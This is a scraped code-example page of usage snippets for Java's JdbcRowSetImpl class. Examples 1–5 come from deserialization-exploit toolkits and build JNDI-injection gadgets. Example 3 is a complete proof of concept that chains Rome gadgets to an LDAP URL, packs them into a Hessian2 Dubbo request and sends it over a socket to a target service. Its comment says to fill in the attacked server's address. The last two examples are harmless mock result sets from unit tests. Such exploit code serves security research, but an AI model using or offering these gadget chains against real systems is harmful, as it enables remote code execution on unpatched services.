com.sun.rowset.JdbcRowSetImpl Java Examples

The following examples show how to use com.sun.rowset.JdbcRowSetImpl. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example #1
Source File: JDKUtil.java    From learnjavabug with MIT License 5 votes vote down vote up
public static JdbcRowSetImpl makeJNDIRowSet ( String jndiUrl ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(jndiUrl);
    rs.setMatchColumn("foo");
    Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
    return rs;
}
 
Example #2
Source File: JDKUtil.java    From marshalsec with MIT License 5 votes vote down vote up
public static JdbcRowSetImpl makeJNDIRowSet ( String jndiUrl ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(jndiUrl);
    rs.setMatchColumn("foo");
    Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
    return rs;
}
 
Example #3
Source File: RomePoc.java    From learnjavabug with MIT License 4 votes vote down vote up
public static void main(String[] args) throws Exception {
  JdbcRowSetImpl rs = new JdbcRowSetImpl();
  //todo 此处填写ldap url
  rs.setDataSourceName("ldap://127.0.0.1:43658/Calc");
  rs.setMatchColumn("foo");
  Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);

  ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs);
  EqualsBean root = new EqualsBean(ToStringBean.class, item);

  HashMap s = new HashMap<>();
  Reflections.setFieldValue(s, "size", 2);
  Class<?> nodeC;
  try {
    nodeC = Class.forName("java.util.HashMap$Node");
  }
  catch ( ClassNotFoundException e ) {
    nodeC = Class.forName("java.util.HashMap$Entry");
  }
  Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
  nodeCons.setAccessible(true);

  Object tbl = Array.newInstance(nodeC, 2);
  Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null));
  Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null));
  Reflections.setFieldValue(s, "table", tbl);

  ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

  // header.
  byte[] header = new byte[16];
  // set magic number.
  Bytes.short2bytes((short) 0xdabb, header);
  // set request and serialization flag.
  header[2] = (byte) ((byte) 0x80 | 0x20 | 2);

  // set request id.
  Bytes.long2bytes(new Random().nextInt(100000000), header, 4);

  ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
  Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
  NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
  sf.setAllowNonSerializable(true);
  out.setSerializerFactory(sf);

  out.writeObject(s);

  out.flushBuffer();
  if (out instanceof Cleanable) {
    ((Cleanable) out).cleanup();
  }

  Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
  byteArrayOutputStream.write(header);
  byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());

  byte[] bytes = byteArrayOutputStream.toByteArray();

  //todo 此处填写被攻击的dubbo服务提供者地址和端口
  Socket socket = new Socket("127.0.0.1", 20880);
  OutputStream outputStream = socket.getOutputStream();
  outputStream.write(bytes);
  outputStream.flush();
  outputStream.close();
}
 
Example #4
Source File: Hibernate2.java    From ysoserial-modified with MIT License 4 votes vote down vote up
public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(cmdHelper.getCommand());
    return Hibernate1.makeCaller(rs,Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData") );
}
 
Example #5
Source File: Hibernate2.java    From ysoserial with MIT License 4 votes vote down vote up
public Object getObject ( String command ) throws Exception {
    JdbcRowSetImpl rs = new JdbcRowSetImpl();
    rs.setDataSourceName(command);
    return Hibernate1.makeCaller(rs,Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData") );
}
 
Example #6
Source File: JdbcWriterCommandsTest.java    From incubator-gobblin with Apache License 2.0 4 votes vote down vote up
private ResultSet createMockResultSet() {
  final List<Map<String, String>> expected = new ArrayList<>();
  Map<String, String> entry = new HashMap<>();
  entry.put("column_name", "name");
  entry.put("column_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_number");
  entry.put("column_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_color");
  entry.put("column_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "date_of_birth");
  entry.put("column_type", "date");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "last_modified");
  entry.put("column_type", "time");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "created");
  entry.put("column_type", "timestamp");
  expected.add(entry);

  return new JdbcRowSetImpl(){
    private Iterator<Map<String, String>> it = expected.iterator();
    private Map<String, String> curr = null;

    @Override
    public boolean first() {
      it = expected.iterator();
      return next();
    }

    @Override
    public boolean next() {
      if(it.hasNext()) {
        curr = it.next();
        return true;
      }
      return false;
    }

    @Override
    public String getString(String columnLabel) throws SQLException {
      if (curr == null) {
        throw new SQLException("NPE on current cursor.");
      }
      String val = curr.get(columnLabel);
      if (val == null) {
        throw new SQLException(columnLabel + " does not exist.");
      }
      return val;
    }
  };
}
 
Example #7
Source File: PostgresWriterCommandsTest.java    From incubator-gobblin with Apache License 2.0 4 votes vote down vote up
private ResultSet createMockResultSet() {
  final List<Map<String, String>> expected = new ArrayList<>();
  Map<String, String> entry = new HashMap<>();
  entry.put("column_name", "name");
  entry.put("data_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_number");
  entry.put("data_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "favorite_color");
  entry.put("data_type", "varchar");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "date_of_birth");
  entry.put("data_type", "date");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "last_modified");
  entry.put("data_type", "time without time zone");
  expected.add(entry);

  entry = new HashMap<>();
  entry.put("column_name", "created");
  entry.put("data_type", "timestamp with time zone");
  expected.add(entry);

  return new JdbcRowSetImpl() {
    private Iterator<Map<String, String>> it = expected.iterator();
    private Map<String, String> curr = null;

    @Override
    public boolean first() {
      it = expected.iterator();
      return next();
    }

    @Override
    public boolean next() {
      if (it.hasNext()) {
        curr = it.next();
        return true;
      }
      return false;
    }

    @Override
    public String getString(String columnLabel)
        throws SQLException {
      if (curr == null) {
        throw new SQLException("NPE on current cursor.");
      }
      String val = curr.get(columnLabel);
      if (val == null) {
        throw new SQLException(columnLabel + " does not exist.");
      }
      return val;
    }
  };
}